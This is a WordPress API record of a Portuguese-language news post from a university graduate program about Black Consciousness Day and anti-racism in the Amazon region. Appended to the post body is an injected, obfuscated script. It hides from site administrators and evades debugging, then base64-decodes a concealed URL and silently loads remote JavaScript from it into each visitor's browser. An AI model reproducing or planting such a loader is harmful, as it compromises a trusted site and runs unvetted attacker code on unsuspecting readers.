{"id":1272,"date":"2025-11-20T12:56:08","date_gmt":"2025-11-20T15:56:08","guid":{"rendered":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/?p=1272"},"modified":"2026-04-16T13:12:46","modified_gmt":"2026-04-16T16:12:46","slug":"dia-da-consciencia-negra","status":"publish","type":"post","link":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/2025\/11\/20\/dia-da-consciencia-negra\/","title":{"rendered":"Dia da Consci\u00eancia Negra"},"content":{"rendered":"\n<p>O Dia da Consci\u00eancia Negra, celebrado em 20 de novembro, \u00e9 mais do que uma data no calend\u00e1rio. \u00c9 um marco de resist\u00eancia, mem\u00f3ria e reflex\u00e3o sobre a hist\u00f3ria e a presen\u00e7a do povo negro no Brasil. Neste dia, homenageamos Zumbi dos Palmares e todos aqueles que, antes e agora, enfrentam estruturas sociais e pol\u00edticas que historicamente marginalizam pessoas negras, reafirmando a luta cont\u00ednua por direitos, igualdade e reconhecimento.<\/p>\n\n\n\n<p>No contexto da Amaz\u00f4nia, a Consci\u00eancia Negra se manifesta de forma singular. Quilombos, comunidades ribeirinhas e tradi\u00e7\u00f5es culturais afro-amaz\u00f4nicas carregam saberes ancestrais, hist\u00f3rias de resist\u00eancia e pr\u00e1ticas que dialogam diretamente com a preserva\u00e7\u00e3o do territ\u00f3rio, da mem\u00f3ria e da identidade coletiva. Reconhecer essas vozes \u00e9 essencial para construir uma sociedade mais justa, plural e inclusiva.<\/p>\n\n\n\n<p>Para o PPGSC a data \u00e9 um convite a refletir sobre a intersec\u00e7\u00e3o entre cultura, sociedade e pol\u00edtica. Falar de Consci\u00eancia Negra \u00e9 compreender que a cultura afro-brasileira sustenta n\u00e3o apenas pr\u00e1ticas art\u00edsticas e rituais, mas tamb\u00e9m formas de conhecimento, estrat\u00e9gias de sobreviv\u00eancia e modos de vida que atravessam gera\u00e7\u00f5es. \u00c9 perceber que o racismo estrutural ainda impacta profundamente o acesso \u00e0 educa\u00e7\u00e3o, \u00e0 sa\u00fade, ao emprego e \u00e0 participa\u00e7\u00e3o social, e que enfrentar essas desigualdades exige a\u00e7\u00e3o coletiva, pesquisa comprometida e engajamento social.<\/p>\n\n\n\n<p>Este 20 de novembro nos lembra que a luta antirracista n\u00e3o pode se limitar a um dia ou a uma data simb\u00f3lica. \u00c9 uma pr\u00e1tica di\u00e1ria de reconhecimento, escuta e transforma\u00e7\u00e3o das estruturas que perpetuam a desigualdade. \u00c9 uma oportunidade de valorizar a mem\u00f3ria viva, fortalecer a cultura e assegurar que a diversidade seja n\u00e3o apenas respeitada, mas celebrada.<\/p>\n\n\n\n<p>O PPGSC reafirma seu compromisso com a promo\u00e7\u00e3o do conhecimento, da pesquisa e da extens\u00e3o voltados \u00e0 valoriza\u00e7\u00e3o da cultura negra, \u00e0 defesa de direitos humanos e \u00e0 constru\u00e7\u00e3o de uma sociedade amaz\u00f4nica mais plural, justa e consciente de sua diversidade.<\/p>\n\n\n\n<p>\ud83d\udda4 Promover sa\u00fade \u00e9 tamb\u00e9m combater o racismo.\ud83d\udda4<\/p>\n<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script>","protected":false},"excerpt":{"rendered":"<p>O Dia da Consci\u00eancia Negra, celebrado em 20 de novembro, \u00e9 mais do que uma data no calend\u00e1rio. \u00c9 um marco de resist\u00eancia, mem\u00f3ria e reflex\u00e3o sobre a hist\u00f3ria e a presen\u00e7a do povo negro no Brasil. Neste dia, homenageamos Zumbi dos Palmares e todos aqueles que, antes e agora, enfrentam estruturas sociais e pol\u00edticas [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":1273,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-1272","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"blocksy_meta":[],"_links":{"self":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1272","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/comments?post=1272"}],"version-history":[{"count":2,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1272\/revisions"}],"predecessor-version":[{"id":1315,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1272\/revisions\/1315"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/media\/1273"}],"wp:attachment":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/media?parent=1272"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/categories?post=1272"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/tags?post=1272"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}